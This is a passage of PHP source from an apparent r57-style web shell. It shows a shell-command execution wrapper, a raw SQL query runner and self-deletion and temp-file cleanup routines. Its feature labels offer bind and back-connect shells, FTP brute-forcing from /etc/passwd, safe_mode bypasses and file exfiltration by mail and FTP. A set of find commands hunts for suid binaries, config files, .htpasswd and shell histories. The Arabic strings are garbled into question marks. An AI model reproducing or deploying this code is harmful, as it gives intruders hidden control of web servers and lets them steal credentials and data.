1629  $sql->host = $_POST['db_server'];
1630  $sql->port = $_POST['db_port'];
1631  $sql->user = $_POST['mysql_l'];
1632  $sql->pass = $_POST['mysql_p'];
1633  $sql->base = $_POST['mysql_db'];
1634  $querys = @explode(';',$_POST['db_query']);
1635  echo '<body bgcolor=#000000>';
1636  if(!$sql->connect()) echo "<div align=center><font face=tahoma size=-2 color=red><b>Can't connect to SQL server</b></font></div>";
1637   else
1638    {
1639    if(!empty($sql->base)&&!$sql->select_db()) echo "<div align=center><font face=tahoma size=-2 color=red><b>?? ?????? ????? ????? ????????</b></font></div>";
1640    else
1641     {
1642     foreach($querys as $num=>$query)
1643      {
1644       if(strlen($query)>5)
1645       {
1646       echo "<font face=tahoma size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query,ENT_QUOTES)."</b></font><br>";
1647       switch($sql->query($query))
1648        {
1649        case '0':
1650        echo "<table width=100%><tr><td><font face=tahoma size=-2>Error : <b>".$sql->error."</b></font></td></tr></table>";
1651        break;
1652        case '1':
1653        if($sql->get_result())
1654         {
1655                echo "<table width=100%>";
1656         foreach($sql->columns as $k=>$v) $sql->columns[$k] = htmlspecialchars($v,ENT_QUOTES);
1657                $keys = @implode("&nbsp;</b></font></td><td bgcolor=#cccccc><font face=tahoma size=-2><b>&nbsp;", $sql->columns);
1658         echo "<tr><td bgcolor=#333333><font face=tahoma size=-2><b>&nbsp;".$keys."&nbsp;</b></font></td></tr>";
1659         for($i=0;$i<$sql->num_rows;$i++)
1660          {
1661          foreach($sql->rows[$i] as $k=>$v) $sql->rows[$i][$k] = htmlspecialchars($v,ENT_QUOTES);
1662          $values = @implode("&nbsp;</font></td><td><font face=tahoma size=-2>&nbsp;",$sql->rows[$i]);
1663          echo '<tr><td><font face=tahoma size=-2>&nbsp;'.$values.'&nbsp;</font></td></tr>';
1664          }
1665         echo "</table>";
1666         }
1667        break;
1668        case '2':
1669        $ar = $sql->affected_rows()?($sql->affected_rows()):('0');
1670        echo "<table width=100%><tr><td><font face=tahoma size=-2>affected rows : <b>".$ar."</b></font></td></tr></table><br>";
1671        break;
1672        }
1673       }
1674      }
1675     }
1676    }
1677  echo "<br><form name=form method=POST>";
1678  echo in('hidden','db',0,$_POST['db']);
1679  echo in('hidden','db_server',0,$_POST['db_server']);
1680  echo in('hidden','db_port',0,$_POST['db_port']);
1681  echo in('hidden','mysql_l',0,$_POST['mysql_l']);
1682  echo in('hidden','mysql_p',0,$_POST['mysql_p']);
1683  echo in('hidden','mysql_db',0,$_POST['mysql_db']);
1684  echo in('hidden','cmd',0,'db_query');
1685  echo "<div align=center>";
1686  echo "<font face=tahoma size=-2><b>Base: </b><input type=text name=mysql_db value=\"".$sql->base."\"></font><br>";
1687  echo "<textarea cols=65 rows=10 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES;\nSELECT * FROM user;"))."</textarea><br><input type=submit name=submit value=\" Run SQL query \"></div><br><br>";
1688  echo "</form>";
1689  echo "<br><div align=center><font face=tahoma size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die();
1690  }
1691 if(isset($_GET['delete']))
1692  {
1693    @unlink(__FILE__);
1694  }
1695 if(isset($_GET['tmp']))
1696  {
1697    @unlink("/tmp/bdpl");
1698    @unlink("/tmp/back");
1699    @unlink("/tmp/bd");
1700    @unlink("/tmp/bd.c");
1701    @unlink("/tmp/dp");
1702    @unlink("/tmp/dpc");
1703    @unlink("/tmp/dpc.c");
1704  }
1705 if(isset($_GET['phpini']))
1706 {
1707 echo $head;
1708 function U_value($value)
1709  {
1710  if ($value == '') return '<i>no value</i>';
1711  if (@is_bool($value)) return $value ? 'TRUE' : 'FALSE';
1712  if ($value === null) return 'NULL';
1713  if (@is_object($value)) $value = (array) $value;
1714  if (@is_array($value))
1715  {
1716  @ob_start();
1717  print_r($value);
1718  $value = @ob_get_contents();
1719  @ob_end_clean();
1720  }
1721  return U_wordwrap((string) $value);
1722  }
1723 function U_wordwrap($str)
1724  {
1725  $str = @wordwrap(@htmlspecialchars($str), 100, '<wbr />', true);
1726  return @preg_replace('!(&[^;]*)<wbr />([^;]*;)!', '$1$2<wbr />', $str);
1727  }
1728 if (@function_exists('ini_get_all'))
1729  {
1730  $r = '';
1731  echo '<table width=100%>', '<tr><td bgcolor=#000000><font face=tahoma size=-2 color=red><div align=center><b>Directive</b></div></font></td><td bgcolor=#000000><font face=tahoma size=-2 color=red><div align=center><b>Local Value</b></div></font></td><td bgcolor=#000000><font face=tahoma size=-2 color=red><div align=center><b>Master Value</b></div></font></td></tr>';
1732  foreach (@ini_get_all() as $key=>$value)
1733   {
1734   $r .= '<tr><td>'.ws(3).'<font face=tahoma size=-2><b>'.$key.'</b></font></td><td><font face=tahoma size=-2><div align=center><b>'.U_value($value['local_value']).'</b></div></font></td><td><font face=tahoma size=-2><div align=center><b>'.U_value($value['global_value']).'</b></div></font></td></tr>';
1735   }
1736  echo $r;
1737  echo '</table>';
1738  }
1739 echo "<br><div align=center><font face=tahoma size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
1740 die();
1741 }
1742 if(isset($_GET['cpu']))
1743  {
1744    echo $head;
1745    echo '<table width=100%><tr><td bgcolor=#000000><div align=center><font face=tahoma size=-2 color=red><b>CPU</b></font></div></td></tr></table><table width=100%>';
1746    $cpuf = @file("cpuinfo");
1747    if($cpuf)
1748     {
1749       $c = @sizeof($cpuf);
1750       for($i=0;$i<$c;$i++)
1751         {
1752           $info = @explode(":",$cpuf[$i]);
1753           if($info[1]==""){ $info[1]="---"; }
1754           $r .= '<tr><td>'.ws(3).'<font face=tahoma size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=tahoma size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>';
1755         }
1756       echo $r;
1757     }
1758    else
1759     {
1760       echo '<tr><td>'.ws(3).'<div align=center><font face=tahoma size=-2><b> --- </b></font></div></td></tr>';
1761     }
1762    echo '</table>';
1763    echo "<br><div align=center><font face=tahoma size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
1764    die();
1765  }
1766 if(isset($_GET['mem']))
1767  {
1768    echo $head;
1769    echo '<table width=100%><tr><td bgcolor=#000000><div align=center><font face=tahoma size=-2 color=red><b>MEMORY</b></font></div></td></tr></table><table width=100%>';
1770    $memf = @file("meminfo");
1771    if($memf)
1772     {
1773       $c = sizeof($memf);
1774       for($i=0;$i<$c;$i++)
1775         {
1776           $info = explode(":",$memf[$i]);
1777           if($info[1]==""){ $info[1]="---"; }
1778           $r .= '<tr><td>'.ws(3).'<font face=tahoma size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=tahoma size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>';
1779         }
1780       echo $r;
1781     }
1782    else
1783     {
1784       echo '<tr><td>'.ws(3).'<div align=center><font face=tahoma size=-2><b> --- </b></font></div></td></tr>';
1785     }
1786    echo '</table>';
1787    echo "<br><div align=center><font face=tahoma size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
1788    die();
1789  }
1790 $lang=array(
1791 'eng_text1' =>'Executed command',
1792 'eng_text2' =>'Execute command on server',
1793 'eng_text3' =>'Run command',
1794 'eng_text4' =>'Work directory',
1795 'eng_text5' =>'Upload files on server',
1796 'eng_text6' =>'Local file',
1797 'eng_text7' =>'Aliases',
1798 'eng_text8' =>'Select alias',
1799 'eng_butt1' =>'Execute',
1800 'eng_butt2' =>'Upload',
1801 'eng_text9' =>'Bind port to /bin/bash',
1802 'eng_text10'=>'Port',
1803 'eng_text11'=>'Password for access',
1804 'eng_butt3' =>'Bind',
1805 'eng_text12'=>'back-connect',
1806 'eng_text13'=>'IP',
1807 'eng_text14'=>'Port',
1808 'eng_butt4' =>'Connect',
1809 'eng_text15'=>'Upload files from remote server',
1810 'eng_text16'=>'With',
1811 'eng_text17'=>'Remote file',
1812 'eng_text18'=>'Local file',
1813 'eng_text19'=>'Exploits',
1814 'eng_text20'=>'Use',
1815 'eng_text21'=>'&nbsp;New name',
1816 'eng_text22'=>'datapipe',
1817 'eng_text23'=>'Local port',
1818 'eng_text24'=>'Remote host',
1819 'eng_text25'=>'Remote port',
1820 'eng_text26'=>'Use',
1821 'eng_butt5' =>'Run',
1822 'eng_text28'=>'Work in safe_mode',
1823 'eng_text29'=>'ACCESS DENIED',
1824 'eng_butt6' =>'Change',
1825 'eng_text30'=>'Cat file',
1826 'eng_butt7' =>'Show',
1827 'eng_text31'=>'File not found',
1828 'eng_text32'=>'Eval PHP code',
1829 'eng_text33'=>'Test bypass open_basedir with cURL functions',
1830 'eng_butt8' =>'Test',
1831 'eng_text34'=>'Test bypass safe_mode with include function',
1832 'eng_text35'=>'Test bypass safe_mode with load file in mysql',
1833 'eng_text36'=>'Database . Table',
1834 'eng_text37'=>'Login',
1835 'eng_text38'=>'Password',
1836 'eng_text39'=>'Database',
1837 'eng_text40'=>'Dump database table',
1838 'eng_butt9' =>'Dump',
1839 'eng_text41'=>'Save dump in file',
1840 'eng_text42'=>'Edit files',
1841 'eng_text43'=>'File for edit',
1842 'eng_butt10'=>'Save',
1843 'eng_text44'=>'Can\'t edit file! Only read access!',
1844 'eng_text45'=>'File saved',
1845 'eng_text46'=>'Show phpinfo()',
1846 'eng_text47'=>'Show variables from php.ini',
1847 'eng_text48'=>'Delete temp files',
1848 'eng_butt11'=>'Edit file',
1849 'eng_text49'=>'Delete script from server',
1850 'eng_text50'=>'View cpu info',
1851 'eng_text51'=>'View memory info',
1852 'eng_text52'=>'Find text',
1853 'eng_text53'=>'In dirs',
1854 'eng_text54'=>'Find text in files',
1855 'eng_butt12'=>'Find',
1856 'eng_text55'=>'Only in files',
1857 'eng_text56'=>'Nothing :(',
1858 'eng_text57'=>'Create/Delete File/Dir',
1859 'eng_text58'=>'name',
1860 'eng_text59'=>'file',
1861 'eng_text60'=>'dir',
1862 'eng_butt13'=>'Create/Delete',
1863 'eng_text61'=>'File created',
1864 'eng_text62'=>'Dir created',
1865 'eng_text63'=>'File deleted',
1866 'eng_text64'=>'Dir deleted',
1867 'eng_butt65'=>'Create',
1868 'eng_text65'=>'Create',
1869 'eng_text66'=>'Delete',
1870 'eng_text67'=>'Chown/Chgrp/Chmod',
1871 'eng_text68'=>'Command',
1872 'eng_text69'=>'param1',
1873 'eng_text70'=>'param2',
1874 'eng_text71'=>"Second commands param is:\r\n- for CHOWN - name of new owner or UID\r\n- for CHGRP - group name or GID\r\n- for CHMOD - 0777, 0755...",
1875 'eng_text72'=>'Text for find',
1876 'eng_text73'=>'Find in folder',
1877 'eng_text74'=>'Find in files',
1878 'eng_text75'=>'* you can use regexp',
1879 'eng_text76'=>'Search text in files via find',
1880 'eng_text80'=>'Type',
1881 'eng_text81'=>'Net',
1882 'eng_text82'=>'Databases',
1883 'eng_text83'=>'Run SQL query',
1884 'eng_text84'=>'SQL query',
1885 'eng_text85'=>'Test bypass safe_mode with commands execute via MSSQL server',
1886 'eng_text86'=>'Download files from server',
1887 'eng_butt14'=>'Download',
1888 'eng_text87'=>'Download files from remote ftp-server',
1889 'eng_text88'=>'FTP-server:port',
1890 'eng_text89'=>'File on ftp',
1891 'eng_text90'=>'Transfer mode',
1892 'eng_text91'=>'Archivation',
1893 'eng_text92'=>'without archivation',
1894 'eng_text93'=>'FTP',
1895 'eng_text94'=>'FTP-bruteforce',
1896 'eng_text95'=>'Users list',
1897 'eng_text96'=>'Can\'t get users list',
1898 'eng_text97'=>'checked: ',
1899 'eng_text98'=>'success: ',
1900 'eng_text99'=>'* use username from /etc/passwd for ftp login and password',
1901 'eng_text100'=>'Send file to remote ftp server',
1902 'eng_text101'=>'Use reverse (user -> resu) login for password',
1903 'eng_text102'=>'Mail',
1904 'eng_text103'=>'Send email',
1905 'eng_text104'=>'Send file to email',
1906 'eng_text105'=>'To',
1907 'eng_text106'=>'From',
1908 'eng_text107'=>'Subj',
1909 'eng_butt15'=>'Send',
1910 'eng_text108'=>'Mail',
1911 'eng_text109'=>'Hide',
1912 'eng_text110'=>'Show',
1913 'eng_text111'=>'SQL-Server : Port',
1914 'eng_text112'=>'Test bypass safe_mode with function mb_send_mail',
1915 'eng_text113'=>'Test bypass safe_mode, view dir list via imap_list',
1916 'eng_text114'=>'Test bypass safe_mode, view file contest via imap_body',
1917 'eng_text115'=>'Test bypass safe_mode, copy file via compress.zlib:// in function copy()',
1918 'eng_text116'=>'Copy from',
1919 'eng_text117'=>'to',
1920 'eng_text118'=>'File copied',
1921 'eng_text119'=>'Cant copy file',
1922 'eng_err0'=>'Error! Can\'t write in file ',
1923 'eng_err1'=>'Error! Can\'t read file ',
1924 'eng_err2'=>'Error! Can\'t create ',
1925 'eng_err3'=>'Error! Can\'t connect to ftp',
1926 'eng_err4'=>'Error! Can\'t login on ftp server',
1927 'eng_err5'=>'Error! Can\'t change dir on ftp',
1928 'eng_err6'=>'Error! Can\'t sent mail',
1929 'eng_err7'=>'Mail send',
1930 'eng_text200'=>'read file from vul copy()',
1931 'eng_text202'=>'where file in server',
1932 'eng_text300'=>'read file from vul curl()',
1933 'eng_text203'=>'read file from vul ini_restore()',
1934 'eng_text204'=>'write shell from vul error_log()',
1935 'eng_text205'=>'write shell in this side',
1936 'eng_text206'=>'read dir',
1937 'eng_text207'=>'read dir from vul reg_glob',
1938 'eng_text208'=>'execute with function',
1939 'eng_text209'=>'read dir from vul root',
1940 'eng_text210'=>'DeZender ',
1941 'eng_text211'=>'::safe_mode off::',
1942 'eng_text212'=>'colse safe_mode with php.ini',
1943 'eng_text213'=>'colse security_mod with .htaccess',
1944 'eng_text214'=>'Admin name',
1945 'eng_text215'=>'IRC server ',
1946 'eng_text216'=>'#room name',
1947 'eng_text217'=>'server',
1948 'eng_text218'=>'write ini.php file to close safe_mode with ini_restore vul',
1949 'eng_text219'=>'Get file to server in safe_mode and change name',
1950 'eng_text220'=>'show file with symlink vul',
1951 'eng_text221'=>'zip file in server to download',
1952 'ar_text222'=>'2 symlink use vul',
1953 'ar_text223'=>'read file from funcution',
1954 'ar_text224'=>'read file from PLUGIN ',
1955 /* --------------------------------------------------------------- */
1956 'ar_text1' =>'????? ??????',
1957 'ar_text2' =>'????? ??????? ?? ???????',
1958 'ar_text3' =>'??? ???????',
1959 'ar_text4' =>'???? ???? ???? ??? ???????',
1960 'ar_text5' =>'??? ??? ??? ???????',
1961 'ar_text6' =>'???? ????',
1962 'ar_text7' =>'????? ?????',
1963 'ar_text8' =>'???? ?????',
1964 'ar_butt1' =>'?????',
1965 'ar_butt2' =>'????',
1966 'ar_text9' =>'??? ???? ?? ??????? ??? /bin/bash',
1967 'ar_text10'=>'?????',
1968 'ar_text11'=>'?????? ??????',
1969 'ar_butt3' =>'???',
1970 'ar_text12'=>'?????? ?????',
1971 'ar_text13'=>'???? ??',
1972 'ar_text14'=>'??????',
1973 'ar_butt4' =>'??????',
1974 'ar_text15'=>'??? ????? ??? ???????',
1975 'ar_text16'=>'?? ????',
1976 'ar_text17'=>'???? ?????',
1977 'ar_text18'=>'???? ?????',
1978 'ar_text19'=>'Exploits',
1979 'ar_text20'=>'??????',
1980 'ar_text21'=>'????? ??????',
1981 'ar_text22'=>'????? ????????',
1982 'ar_text23'=>'?????? ??????',
1983 'ar_text24'=>'??????? ??????',
1984 'ar_text25'=>'?????? ??????',
1985 'ar_text26'=>'??????',
1986 'ar_butt5' =>'?????',
1987 'ar_text28'=>'????? ?? ????? ?????',
1988 'ar_text29'=>'????? ??????',
1989 'ar_butt6' =>'????',
1990 'ar_text30'=>'??? ???',
1991 'ar_butt7' =>'???',
1992 'ar_text31'=>'????? ??? ?????',
1993 'ar_text32'=>'????? ??? php ?? ???? ???? eval',
1994 'ar_text33'=>'Test bypass open_basedir with cURL functions',
1995 'ar_butt8' =>'??????',
1996 'ar_text34'=>'????? ??????? ?? ???? ???? include',
1997 'ar_text35'=>'????? ??????? ?? ???? ???? Mysql',
1998 'ar_text36'=>'??????? . ??????',
1999 'ar_text37'=>'??? ????????',
2000 'ar_text38'=>'???? ??????',
2001 'ar_text39'=>'???????',
2002 'ar_text40'=>'???? ?? ????? ???????',
2003 'ar_butt9' =>'????',
2004 'ar_text41'=>'??? ?????? ??',
2005 'ar_text42'=>'????? ???????',
2006 'ar_text43'=>'????? ?????? ??????',
2007 'ar_butt10'=>'???',
2008 'ar_text44'=>'???????? ??????? ??? ??? ????? ??? ????',
2009 'ar_text45'=>'?? ?????',
2010 'ar_text46'=>'??? phpinfo()',
2011 'ar_text47'=>'???? ????????? ?? php.ini',
2012 'ar_text48'=>'??? ????? ??? temp',
2013 'ar_butt11'=>'????? ?????',
2014 'ar_text49'=>'??? ??????? ?? ???????',
2015 'ar_text50'=>'??? ??????? ??????? ????????',
2016 'ar_text51'=>'??? ??????? ???????',
2017 'ar_text52'=>'??? ??',
2018 'ar_text53'=>'?? ??????',
2019 'ar_text54'=>'??? ?? ?? ?? ???????',
2020 'ar_butt12'=>'???',
2021 'ar_text55'=>'??? ?? ???????',
2022 'ar_text56'=>'?????? :(',
2023 'ar_text57'=>'?????/??? ???/????',
2024 'ar_text58'=>'?????',
2025 'ar_text59'=>'???',
2026 'ar_text60'=>'????',
2027 'ar_butt13'=>'????? /???',
2028 'ar_text61'=>'?? ????? ?????',
2029 'ar_text62'=>'?? ????? ??????',
2030 'ar_text63'=>'?? ??? ?????',
2031 'ar_text64'=>'?? ??? ??????',
2032 'ar_butt65'=>'?????',
2033 'ar_text66'=>'???',
2034 'ar_text67'=>'???????/????????/????????',
2035 'ar_text68'=>'???',
2036 'ar_text69'=>'??? ?????',
2037 'ar_text70'=>'???????',
2038 'ar_text71'=>"Second commands param is:\r\n- for CHOWN - name of new owner or UID\r\n- for CHGRP - group name or GID\r\n- for CHMOD - 0777, 0755...",
2039 'ar_text72'=>'???? ??????',
2040 'ar_text73'=>'??? ?? ????????',
2041 'ar_text74'=>'??? ?? ???????',
2042 'ar_text75'=>'* you can use regexp',
2043 'ar_text76'=>'????? ?? ?? ?? ????? ?????? find',
2044 'ar_text80'=>'?????',
2045 'ar_text81'=>'?????????',
2046 'ar_text82'=>'????? ????????',
2047 'ar_text83'=>'????? ??? ???????',
2048 'ar_text84'=>'??????? ?????',
2049 'ar_text85'=>'Test bypass safe_mode with commands execute via MSSQL server',
2050 'ar_text86'=>'????? ????? ?? ???????',
2051 'ar_butt14'=>'?????',
2052 'ar_text87'=>'????? ????? ?? ???? ???? ?? ??',
2053 'ar_text88'=>'????? ???? ?? ??:??????',
2054 'ar_text89'=>'??? ?? ???? ?? ??',
2055 'ar_text90'=>'??????? ???',
2056 'ar_text91'=>'?????',
2057 'ar_text92'=>'?? ??? ???????',
2058 'ar_text93'=>'???? ?? ??',
2059 'ar_text94'=>'????? ???? ?? ??',
2060 'ar_text95'=>'????? ??????????',
2061 'ar_text96'=>'?? ????? ??? ????? ??????????',
2062 'ar_text97'=>'?? ?????: ',
2063 'ar_text98'=>'?? ?????: ',
2064 'ar_text99'=>'* ?????? ????? ?????????? ?? ??? /etc/passwd ????? ??? ftp',
2065 'ar_text100'=>'????? ??? ??? ???? ???? ?? ??',
2066 'ar_text101'=>'?????? ??????? ?????? ????????',
2067 'ar_text102'=>'????? ??????',
2068 'ar_text103'=>'????? ????',
2069 'ar_text104'=>'????? ??? ??? ???????',
2070 'ar_text105'=>'???',
2071 'ar_text106'=>'???',
2072 'ar_text107'=>'???????',
2073 'ar_butt15'=>'?????',
2074 'ar_text108'=>'???????',
2075 'ar_text109'=>'????',
2076 'ar_text110'=>'???',
2077 'ar_text111'=>'????? ????? ???????? : ??????',
2078 'ar_text112'=>'????? ??????? ?? ???? ???? ???? mb_send_mail',
2079 'ar_text113'=>'????? ????? ???????? ?? ???? via imap_list',
2080 'ar_text114'=>'????? ??????? ?? ???? ???? via imap_body',
2081 'ar_text115'=>'????? ??????? ?? ???? compress.zlib://',
2082 'ar_text116'=>'??? ??',
2083 'ar_text117'=>'???',
2084 'ar_text118'=>'?? ??? ?????',
2085 'ar_text119'=>'???????? ?????',
2086 'ar_err0'=>'???? ! ?????? ??????? ??? ??? ????? ',
2087 'ar_err1'=>'???? ! ??? ???? ??? ????? ??? ????? ',
2088 'ar_err2'=>'????! ?????? ??????? ',
2089 'ar_err3'=>'????! ??? ???? ??? ??????? ????? ?? ??',
2090 'ar_err4'=>'???? ! ???????? ?????? ??? ????? ???? ?? ??',
2091 'ar_err5'=>'???? ! ???????? ???? ?????? ?? ???? ?? ??',
2092 'ar_err6'=>'???? ! ???????? ????? ?????',
2093 'ar_err7'=>'?????? ????',
2094 'ar_text200'=>'copy()????? ??????? ?? ???? ????',
2095 'ar_text202'=>'???? ????? ?????? ??????',
2096 'ar_text300'=>'curl()????? ??????? ?? ???? ????',
2097 'ar_text203'=>'ini_restore()????? ??????? ?? ???? ????',
2098 'ar_text204'=>'error_log()????? ??????? ?? ???? ????',
2099 'ar_text205'=>'???? ???? ??? ??? ??????',
2100 'ar_text206'=>'????? ??????? ??????',
2101 'ar_text207'=>'????? ??????? ???????? ?? ???? ???? reg_glob',
2102 'ar_text208'=>'????? ??????? ?? ????? ????? ?? ???? ??????',
2103 'ar_text209'=>'????? ??????? ???????? ?? ???? ???? root',
2104 'ar_text210'=>'?? ????? ????? ',
2105 'ar_text211'=>'::????? ????? ???::',
2106 'ar_text212'=>'php.ini ????? ????? ??? ?? ???? ??? ???',
2107 'ar_text213'=>'htacces ????? ????? ??????? ?? ???? ??? ???',
2108 'ar_text214'=>'??? ??????',
2109 'ar_text215'=>'????? ??????? IRC ',
2110 'ar_text216'=>'# ??? ?????? ??',
2111 'ar_text217'=>'??? ??????? ???????',
2112 'ar_text218'=>'?????? ????? ??? ini_restore ??? ??? ????? ??? ????',
2113 'ar_text219'=>'??? ????? ??? ??????? ????? ????? ?????? ?????',
2114 'ar_text220'=>'??????? ??????? ?? ???? ???? symlink ?????? ??????',
2115 'ar_text221'=>'??? ??????? ???????? ?? ??????(??? ??????? ?????? ??? ?????? ????? ???????? ??????)1',
2116 'ar_text222'=>'??????? ??????? ?? ???? ???? symlink ?????? ???????',
2117 'ar_text223'=>'????? ??????? ?? ???? ??????',
2118 'ar_text224'=>'PLUGIN ????? ??????? ?? ???? ???? ',
2119 );
2120 /*
2121 ?????? ??????
2122 ????????? ???????? ????????????? ?????? ????? ? ???-?? ??????. ( ??????? ????????? ???? ????????? ???? )
2123 ?? ?????? ???? ????????? ??? ???????? ???????.
2124 */
2125 $aliases=array(
2126 '????? ?? ????? suid'=>'find / -type f -perm -04000 -ls',
2127 '????? ?? ????? suid ?? ?????? ??????'=>'find . -type f -perm -04000 -ls',
2128 '????? ?? ????? suid'=>'find / -type f -perm -02000 -ls',
2129 '????? ?? ????? suid ?? ?????? ??????'=>'find . -type f -perm -02000 -ls',
2130 '????? ?? ????? config.inc.php'=>'find / -type f -name config.inc.php',
2131 '????? ?? ????? config.inc.php ?? ?????? ??????'=>'find . -type f -name config.inc.php',
2132 '????? ?? ????? config* ????? ??????????'=>'find / -type f -name "config*"',
2133 '????? ?? ????? config* ?? ?????? ??????'=>'find . -type f -name "config*"',
2134 '????? ?? ??????? ??????? ???????'=>'find / -type f -perm -2 -ls',
2135 '????? ?? ??????? ??????? ??????? ?? ?????? ??????'=>'find . -type f -perm -2 -ls',
2136 '????? ?? ???????? ??????? ???????'=>'find /  -type d -perm -2 -ls',
2137 '????? ?? ???????? ??????? ??????? ?? ?????? ??????'=>'find . -type d -perm -2 -ls',
2138 '????? ?? ????? ??????? ????? ???????'=>'find / -perm -2 -ls',
2139 '????? ?? ????? ??????? ?? ?????? ??????'=>'find . -perm -2 -ls',
2140 '????? ?? ????? service.pwd'=>'find / -type f -name service.pwd',
2141 '????? ?? ????? service.pwd ?? ?????? ??????'=>'find . -type f -name service.pwd',
2142 '????? ?? ?? ????? ??????? ??????? .htpasswd'=>'find / -type f -name .htpasswd',
2143 '????? ?? ???? ????? ??????? ??????? ?? ?????? ??????'=>'find . -type f -name .htpasswd',
2144 '????? ?? ???? ????? .bash_history'=>'find / -type f -name .bash_history',
2145 '????? ?? ???? ????? .bash_history ?? ?????? ??????'=>'find . -type f -name .bash_history',
2146 '????? ?? ???? ????? .mysql_history'=>'find / -type f -name .mysql_history',
2147 '????? ?? ???? ????? .mysql_history ?? ?????? ??????'=>'find . -type f -name .mysql_history',
2148 '????? ?? ???? ????? .fetchmailrc'=>'find / -type f -name .fetchmailrc',
2149 '????? ?? ???? ????? .fetchmailrc ?? ?????? ??????'=>'find . -type f -name .fetchmailrc',
2150 '??? ????? ????? ?? ??????'=>'lsattr -va',
2151 '???? ???????? ???????? ?? ???????'=>'netstat -an | grep -i listen',
2152 '???? ???? ???????? ???????? ???????'=>'cat /etc/fstab',
2153 '?????? ??? ????? ????? ???? ???? ???????? ??? ???????'=>'cat /var/cpanel/accounting.log',
2154 '?????? ???????? ???? ???? ???? ???????'=>'ps aux',
2155 '?????????? ???????? ?????'=>'w',
2156 '??? ???????? ?????'=>'lastlog',
2157 '??? ????? ????? wget curl ..etc'=>'which wget curl w3m lynx',
2158 '??? ???? ??????? gcc'=>'locate gcc',
2159 
2160 '----------------------------------------------------------------------------------------------------'=>'ls -la'
2161 );
2162 $table_up1  = "<tr><td bgcolor=#272727><font face=tahoma size=-2><b><div align=center>:: ";
2163 $table_up2  = " ::</div></b></font></td></tr><tr><td>";
2164 $table_up3  = "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#cccccc><tr><td bgcolor=#333333>";
2165 $table_end1 = "</td></tr>";
2166 $arrow = " <font face=Webdings color=gray>4</font>";
2167 $lb = "<font color=black>[</font>";
2168 $rb = "<font color=black>]</font>";
2169 $font = "<font face=tahoma size=-2>";
2170 $ts = "<table class=table1 width=100% align=center>";
2171 $te = "</table>";
2172 $fs = "<form name=form method=POST>";
2173 $fe = "</form>";
2174 if(isset($_GET['users']))
2175  {
2176  if(!$users=get_users()) { echo "<center><font face=tahoma size=-2 color=red>".$lang[$language.'_text96']."</font></center>"; }
2177  else
2178   {
2179   echo '<center>';
2180   foreach($users as $user) { echo $user."<br>"; }
2181   echo '</center>';
2182   }
2183  echo "<br><div align=center><font face=tahoma size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die();
2184  }
2185 if (!empty($_POST['dir'])) { @chdir($_POST['dir']); }
2186 $dir = @getcwd();
2187 $unix = 0;
2188 if(strlen($dir)>1 && $dir[1]==":") $unix=0; else $unix=1;
2189 if(empty($dir))
2190  {
2191  $os = getenv('OS');
2192  if(empty($os)){ $os = php_uname(); }
2193  if(empty($os)){ $os ="-"; $unix=1; }
2194  else
2195     {
2196     if(@eregi("^win",$os)) { $unix = 0; }
2197     else { $unix = 1; }
2198     }
2199  }
2200 if(!empty($_POST['s_dir']) && !empty($_POST['s_text']) && !empty($_POST['cmd']) && $_POST['cmd'] == "search_text")
2201   {
2202     echo $head;
2203     if(!empty($_POST['s_mask']) && !empty($_POST['m'])) { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text'],$_POST['s_mask']); }
2204     else { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text']); }
2205     $sr->SearchText(0,0);
2206     $res = $sr->GetResultFiles();
2207     $found = $sr->GetMatchesCount();
2208     $titles = $sr->GetTitles();
2209     $r = "";
2210     if($found > 0)
2211     {
2212       $r .= "<TABLE width=100%>";
2213       foreach($res as $file=>$v)
2214       {
2215         $r .= "<TR>";
2216         $r .= "<TD colspan=2><font face=tahoma size=-2><b>".ws(3);
2217         $r .= (!$unix)? str_replace("/","\\",$file) : $file;
2218         $r .= "</b></font></ TD>";
2219         $r .= "</TR>";
2220         foreach($v as $a=>$b)
2221         {
2222           $r .= "<TR>";
2223           $r .= "<TD align=center><B><font face=tahoma size=-2>".$a."</font></B></TD>";
2224           $r .= "<TD><font face=tahoma size=-2>".ws(2).$b."</font></TD>";
2225           $r .= "</TR>\n";
2226         }
2227       }
2228       $r .= "</TABLE>";
2229     echo $r;
2230     }
2231     else
2232     {
2233       echo "<P align=center><B><font face=tahoma size=-2>".$lang[$language.'_text56']."</B></font></P>";
2234     }
2235   echo "<br><div align=center><font face=tahoma size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
2236   die();
2237   }
2238 if(!$safe_mode && strpos(ex("echo abcr57"),"r57")!=3) { $safe_mode = 1; }
2239 $SERVER_SOFTWARE = getenv('SERVER_SOFTWARE');
2240 if(empty($SERVER_SOFTWARE)){ $SERVER_SOFTWARE = "-"; }
2241 function ws($i)
2242 {
2243 return @str_repeat("&nbsp;",$i);
2244 }
2245 function ex($cfe)
2246 {
2247  $res = '';
2248  if (!empty($cfe))
2249  {
2250   if(function_exists('exec'))
2251    {
2252     @exec($cfe,$res);
2253     $res = join("\n",$res);
2254    }
2255   elseif(function_exists('shell_exec'))
2256    {
2257     $res = @shell_exec($cfe);
2258    }
2259   elseif(function_exists('system'))
2260    {
2261     @ob_start();
2262     @system($cfe);
2263     $res = @ob_get_contents();
2264     @ob_end_clean();
2265    }
2266   elseif(function_exists('passthru'))
2267    {
2268     @ob_start();
2269     @passthru($cfe);
2270     $res = @ob_get_contents();
2271     @ob_end_clean();
2272    }
2273   elseif(@is_resource($f = @popen($cfe,"r")))
2274   {
2275    $res = "";
2276    while(!@feof($f)) { $res .= @fread($f,1024); }
2277    @pclose($f);
2278   }
2279  }
2280  return $res;
2281 }
2282 function get_users()
2283 {
2284   $users = array();
2285   $rows=file('/etc/passwd');
2286   if(!$rows) return 0;
2287   foreach ($rows as $string)
2288    {
